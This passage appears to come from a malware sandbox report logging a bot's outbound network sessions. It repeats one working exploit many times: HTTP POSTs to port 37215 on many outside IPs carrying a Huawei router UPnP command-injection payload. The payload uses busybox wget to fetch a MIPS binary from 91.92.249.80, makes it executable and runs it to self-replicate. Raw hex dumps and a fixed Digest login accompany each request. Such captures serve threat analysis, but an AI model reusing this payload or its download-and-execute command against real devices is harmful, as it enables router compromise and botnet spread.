                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          520192.168.2.235773217.229.19.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195769072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          521192.168.2.235438643.49.18.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195770025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          522192.168.2.2359704197.30.102.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195769072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          523192.168.2.2342832197.214.229.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195806980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          524192.168.2.235813641.213.217.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195878983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          525192.168.2.2346790197.66.152.1737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195880890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          526192.168.2.236075641.11.191.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195919037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          527192.168.2.235846441.168.155.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195920944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          528192.168.2.2346014197.236.247.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195967913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          529192.168.2.2338624197.187.75.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195987940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          530192.168.2.235655841.212.233.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196002007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
